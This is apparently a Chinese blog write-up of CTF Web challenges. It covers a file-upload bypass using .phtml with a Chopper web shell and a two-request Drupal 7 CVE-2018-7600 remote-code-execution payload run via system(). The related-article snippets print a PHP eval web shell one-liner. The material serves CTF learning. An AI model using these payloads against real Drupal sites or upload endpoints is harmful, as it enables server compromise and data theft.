CUMT第一轮双月赛Web题解

最新推荐文章于 2021-08-06 11:55:29 发布
最新推荐文章于 2021-08-06 11:55:29 发布
阅读量930 收藏 3
点赞数
分类专栏: CTF Web 文章标签: CUMT双月赛 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011377996/article/details/85058035
版权

ez-upload

这个题目作为Web题的第一个题难度刚好,很基础的漏洞点,就考了个文件上传,上来直接用phtml就可以绕过,但是给出来的hint是.htaccess,可能是我非预期了?

Fa0BnI.png

菜刀链接获取flag

Fa0rHP.png

Cve

参考了这篇文章:https://www.menzel3.fun/2018/08/02/Drupal%20CVE2018-7600/#代码执行现场

这是一个Drupal 7的cve,照着构造payload就好,payload 分为两个请求。 先将 Payload 注入缓存中,构造下面的payload,发送一个POST包

POST请求:/?q=user/password&name[%23post_render][]=system&name[%23type]=markup&name[%23markup]=ls%20/

POST内容:form_id=user_pass&_triggering_element_name=name

获取form_build_id的value值:

FayX0s.png

然后再POST发送执行的包:/?q=file/ajax/name/%23value/form-b7pP9HUKwcQBEuhZ1GZ79qWXV0KRb5YxUGoWaozSPRU这里也需要form_build_id的值,POST的内容也是:form_build_id=form-b7pP9HUKwcQBEuhZ1GZ79qWXV0KRb5YxUGoWaozSPRU成功执行命令,这里注意一下参考文章里面的passthru命令用不了,只能改为system才能执行相关命令,所以上面缓存的时候换了用system函数

Fa6knJ.png

再来一次cat /flag的操作就可以读取flag了

最低0.47元/天 解锁文章
0verWatch
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CUMT-CTF第一次双月赛Writeup
Gard3nia的博客
03-02 1374
前言 知其然,知其所以然 正文 WEB ez-upload 题目描述是可以上传图片的,就随手上传一张图片上去 回显出目录结构如下: 访问URL发现可以看到上传的图片: 知道了上传目录,现在要做的就是上传成功一个Web Shell。 连接Cknife,写了个php小马,上传发现不可以上传以php结尾的文件。 第一次抓包尝试加00截断,未果。 第二次将后缀改成1.php.abc可以成功上传,但是...
CumtCTF第二次双月赛Writeup(Web详解)
Lethe's Blog
03-03 1379
CUMT第二次双月赛——Web Web1:签到题 1、打开题目,源码直接显示在网页上。 2、发现构造0ver、0ver1、0ver2即可,下面就进行代码审计: (1)首先构造 0ver,有以下三个条件: ① ereg("^[0-9]+$", $a) === FALSE),即要进行一次或多次 0-9 数字正则表达式匹配 ② in_array($a,$white_l
【渗透测试】Drupal 漏洞 CVE-2018-7600 远程代码执行-复现
SunnyCat
01-11 9160
Drupal 漏洞 CVE-2018-7600 远程代码执行-复现 漏洞简介: Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏洞原理: drupal的注册页面,当我们提交的数据有问题时,它
Hackthis!! Writeup——Main Level
qq_43148462的博客
12-30 337
Level 1: 最常见的查看源代码,然后可以轻易地找到注释中的username和Password Level 2: 同样是查看源代码,然后就隐藏在代码行中 Level 3: 同样是查看源代码,这次是一个JS代码验证(然而关掉JS并绕不过。。服务器端应该也有验证) Level4: 同样是查看源代码,这次给了一个网页直接访问这个url,得到密码 Level 5: 同样是查看源代码,然后可以发现以...
Drupal 远程代码执行漏洞(CVE-2018-7602)
07-19 3101
漏洞复现:1.如下图所示,执行以下命令即可复现该漏洞。示例命令为 id,如图红框中显示,可以执行该命令。 "id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码 python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://ip:8081/2.得有CVE-2018-7600的PoC。 #!/usr/bin/en...
cumt.rar_cumt_opnet_拓扑图
09-23
cumt.ppt很可能是一个演示文稿,详细介绍了cumt项目中的OPNET应用和拓扑结构。这样的PPT通常包含丰富的图表和步骤指导,对于初学者来说,是理解和掌握OPNET操作流程的重要参考资料。而www.pudn.com.txt可能是一个...
CUMT微机原理练习题
08-23
CUMT微机原理的复习题
CUMT2021算法导论OJ(python版).rar
11-16
CUMT2021算法导论OJ(python版).rar》是一个压缩包,包含的资源主要用于学习和实践算法,特别强调了Python语言的应用。这个资源可能出自中国矿业大学(CUMT)的一门课程,旨在帮助学生掌握算法基础,并通过在线判题...
CUMT密码学课程设计源码.7z
12-13
CUMT密码学课程设计源码.7z A5.py ---------------> A5加解密 RC4加解密.py-----------------> RC4加解密 DES_destruct----------->DES加解密的S盒,P盒等结构 DES加解密文件.py ---------->DES核心算法 Digital...
第十一章机械振动测试(CUMT测试技术).pptx
10-07
第十一章深入探讨了机械振动测试的各个方面,这是中国矿业大学机电学院教学内容的一部分,旨在帮助学生理解振动测试的基本原理,掌握测振系统的构成及其功能,熟悉振动分析仪的运用,以及了解振动系统动态特性测试的...
trigger_name 的命名规范
weixin_30387423的博客
11-20 243
trigger_name = table_name_[A|B] [I|U|D] [R|S] trigger_name 长度限制在30个字符 表名缩写+trigger属性信息trigger属性信息[A|B] 触发器类型是BEFORE 还是AFTER.[I|U|D] 显示触发器事件, INSERT,UPDATE,DELETE[R|S] 显...
drupal 7 ajax,【漏洞分析】CVE-2018-7600 Drupal 7.x 版本代码执行
weixin_35700003的博客
08-06 1279
阅读:8,003CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出来之后大家都赶紧分析了一波,然后热度似乎慢慢退去了。两天前Drupalgeddon2项目更新了7.x版本的exp,实际环境也出现了利用,下面就简单来看一下0x01 概述CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出...
BUUCTF笔记之Web系列部分WriteUp(四)
热门推荐
克格莫
06-24 2万+
1.[BJDCTF2020]Mark loves cat dirb扫描目录发现.git泄露。 githack获取源码 <?php $flag = file_get_contents('/flag'); //HTML代码太多了,人工删除 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($
cumt12月双月赛部分RE
WocW的博客
12-17 315
好像是第一次觉得自己在参加比赛... 1.RE-open the gate of RE 查看文件头是elf文件 使用IDA打开,查看字符串发现什么都没有 然后使用linux的edb打开动态调试。开头直接jmp到这个函数,F8执行完这个函数就显示了字符串 然后F7跟进这个函数 继续往下执行第二个syscall会卡住,然后直接跳过到执行下面的循环 阅读汇编得知这里...
安恒月赛WriteUp-2018.12
BlusKing
12-22 2893
安恒月赛WriteUp2018-12月   WEB1-easy: web1反序列化   一打开就显示了源代码:  &lt;?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
奇怪的恐龙特性
hhh
11-17 546
  做这道题发现了好多自己之前完全不知道的小知识…… php小特性   php自身在解析请求时,会把+和.解析成下划线; 数字绕过   数组永远比数字大,永远比数字大hh 字符   admin在和整形比较时,会被强制转换成整形,而它的整形……刚好是0   所以,payload就是…… http://60.205.189.243:9010/?A+A[]="admin" ...
CTF-安恒18年十一月月赛部分writeup
weixin_33786077的博客
12-14 619
安恒十一月月赛writeup 昨天做了一下十一月的题目,不才只做出来几道 签到web1 这个是十月的原题,因为忘了截图所以只能提供思路 Web消息头包含了登陆框的密码 输入密码后进入上传页面,上传一句话木马1.jpg, <?php @eval($_POST['cmd']);?> 使用burp将上传文件名改为1.php.jpg 然后post数据发现已经getshel...
北邮网安杯总结
Hellsegamosken
05-14 1093
线上赛 大概有两个比较有意思的题吧。 1 给定两个字符串 s,t,问能否通过以下操作把 s 变成 t。 操作为:把一个字符串分成三等份,每份递归进行这个操作,然后按照任意顺序排列着三部分,得到新的串。 ∣s∣,∣t∣≤100000|s|,|t|\leq 100000∣s∣,∣t∣≤100000 看起来无从下手。 突然灵机一动,发现操作可逆。也就是说如果 s 能变成 t,那么 s 能变成的串的集合和...
cumt网络安全实验
最新发布
11-11
cumt网络安全实验是中国矿业大学(北京)开设的一门实践课程,旨在培养学生对网络安全领域的理论知识和实际操作技能。这门课程内容涵盖了网络攻防技术、安全漏洞挖掘、数据加密与解密、安全协议设计等方面的内容。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值